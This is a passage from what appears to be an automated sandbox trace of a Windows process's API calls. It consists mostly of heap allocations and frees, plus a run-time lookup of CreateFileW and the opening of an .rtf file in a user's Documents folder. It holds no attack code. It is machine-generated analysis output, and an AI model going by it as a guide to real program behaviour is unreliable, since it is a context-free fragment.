(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3608 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0082.643] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3878 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0082.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4618 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0082.644] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c20 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.644] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ba0 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c90 [0082.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0082.645] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bc0 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c40 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3620 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3698 | out: hHeap=0x1780000) returned 1 [0082.646] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.646] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0082.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c3668 [0082.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43c3668, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.647] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c80 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2be0 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0082.647] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0082.647] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\F0N0.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\f0n0.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b60 [0082.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3860 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c60 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37e8 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3668 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3668 | out: hHeap=0x1780000) returned 1 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37a0 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37b8 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3800 [0082.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c90 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.648] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35a8 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c35d8 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bc0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3830 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0082.649] FreeLibrary (hLibModule=0x772d0000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c20 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c40 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3728 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0082.649] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb120 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb420 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb468 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb438 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3c0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb450 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3878 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37d0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4618 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0082.650] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0082.650] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0082.650] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: 